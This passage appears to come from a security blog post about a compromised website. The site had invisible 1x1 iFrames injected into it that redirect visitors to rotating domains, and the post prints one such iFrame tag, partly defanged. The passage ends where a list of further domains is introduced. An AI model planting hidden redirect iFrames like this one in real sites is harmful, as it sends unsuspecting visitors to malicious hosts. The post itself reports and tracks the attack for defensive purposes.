We were working on a compromised site today that had some hidden iFrames on it. The iFrames were redirecting visitors to what seemed like random domains. This is the iFrame we were seeing:
<iFrame src="httx://directs016. ru/in.cgi?wal" width=1 height=1 ..
Nothing new, but we decided to check how popular it was, and we were able to detect a few other sites with it. After a while the iFrame being injected changed and as we continued to track it, we noticed that it was changing every few hours. Here are some of the domains used up in the last few days: